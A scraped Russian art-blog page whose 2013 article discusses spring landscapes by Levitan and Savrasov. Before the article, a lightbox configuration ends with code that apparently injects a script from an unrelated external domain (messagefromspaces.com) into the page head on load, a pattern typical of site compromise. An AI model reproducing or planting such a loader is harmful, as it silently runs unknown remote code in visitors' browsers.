, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Картины весны

Автор: Дмитрий Алмазов | 22 Апр 2013

Весна вступает в свои права и, конечно же, наше внимание приковывает меняющаяся природа. Именно эту красоту картина Мартживописцы запечатлели в картинах, посвященных прекрасному времени года – весне.

Исаак Левитан, воспевающий просторы родного края, посвятил сюжет своих полотен многим пейзажам, в числе которых есть и весенние. До него никто из художников не изображал раннюю весну так ярко и живописно, как Левитан в своей работе «Март»(1895). Каждой детали картины отведено особое место и найден отдельный подход. Настроение природы, только что начинающей пробуждаться, передается, в первую очередь, через ослепительно лучезарное солнце. Так же изображен и снег, в котором играет множество различных оттенков, который блестит и тут же тает. Ярко-Весна. Большая водаголубое чистое небо символизирует, что метелей не предвидится и наконец-то пришла весна. Теплые краски, в которых изображен дом, лошадь, крыльцо, придают картине еще больше солнечного света, согревающего взор зрителя. Художник сумел передать настроение, которое проникнуто чувством ожидания. Создается впечатление, что вот-вот зазвенит весенняя капель, совсем скоро выйдет из двери открытого дома хозяин, которого уже заждалась лошадка  и они отправятся в путь. Все эти элементы ожидания символизируют главное – природу, ожидающую весну.

Еще одна работа Левитана «Весна. Большая вода» не менее живописно показывает то, как просыпается природа после зимней спячки. Как только снег сошел, наступает половодье, реки завоевывают новые территории, выходя из берегов. Художник выдвигает на передний план лодку, которая осталась единственным средством связи между домами, изображенными вдалеке на большом расстоянии друг от друга. Основную часть полотна занимает вышедшая из берегов река. С помощью ярких красок Левитан передает неповторимость весны и вносит ноты позитива.

Грачи прилетелиНе меньшего внимания заслуживает картина Алексея Саврасова «Грачи прилетели» (1871), известная всем со школьной скамьи. В отличие от других полотен, посвященных весне, художник отошел от обычного изображения времени года, а особое место отвел вестникам потепления, притаившимся на деревьях. Грачи, расположившиеся на березе, расположены на переднем плане, чем художник хотел подчеркнуть: птицы слышат и чувствуют приход весны раньше человека. В картине преобладают темные тона, так как весна приходит медленно и постепенно. Несмотря на то, что земля еще покрыта тающим снегом, деревья еще тянут друг к другу голые ветки, небо затянуто темными тучами, прослеживаются весенние звуки. Кое-где проглядываются робкие лучики солнца, снег искрится тающими каплями и конечно же, главным символом наступления весны здесь являются грачи. Сдержанные неброские тона и приглушенная цветовая палитра делают полотно Саврасова глубоким и проникновенным, а также заставляют человека радоваться простому и в то же время великому пробуждению природы.

Каждый из характеров, представляющих красоту весенней поры, по-своему отражают специфику данного времени года и заставляют смотрящего восхищаться как яркими, так и приглушенными красками в картинах весны.

Темы: Галерея картин художников, о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress